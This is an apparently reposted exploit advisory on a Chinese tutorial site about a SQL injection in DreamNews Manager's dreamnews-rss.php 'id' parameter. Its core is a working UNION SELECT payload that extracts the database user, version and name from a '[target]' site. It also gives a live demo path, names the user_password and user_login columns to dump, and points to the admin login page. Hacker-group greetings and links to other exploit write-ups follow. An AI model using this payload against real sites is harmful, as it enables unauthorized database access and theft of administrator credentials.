手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >DreamNews Manager (id) Remote SQL Injection Vulnerability
DreamNews Manager (id) Remote SQL Injection Vulnerability
摘要:###########################################################dreamnews(r...

#########################################################

#

# dreamnews ( rss) Remote SQL Injection Vulnerability

#========================================================

# Author: Hussin X =

# =

# Home : www.tryag.cc/cc =

# =

# email: darkangel_g85[at]Yahoo[DoT]com =

# =

#=========================================================

#

# script : /dreamnews.php

#

# DorK : N/A

#

##########################################################

Exploit:

www.[target].com/Script/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--

L!VE DEMO:

/demo/dreamnews/dreamnews-rss.php?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(user(),version(),database()),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36--

column_name :

user_password

user_login

Admin Login :

/admin/

########################( Greetz )###########################

# #

# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke #

# #

# Iraqihack / FAHD / mos_chori / Silic0n #

# #

#############################################################

Im IRAQi

【DreamNews Manager (id) Remote SQL Injection Vulnerability】相关文章:

PHP的一个EVAL的利用防范

360安全卫士总是阻止hosts更改该怎么办?

php包含漏洞替代技术的方法与介绍 php文件包含漏洞详解

恶意js脚本注入访问伪随机域名的实例解析

MojoPersonals (mojoClassified.cgi mojo) Blind SQL Injection Exploit

hektek使用说明

gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability

打开网站提示“此网站的安全证书有问题”怎么办

Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit

e107 Plugin BLOG Engine 2.2 Blind SQL Injection Exploit

精品推荐
分类导航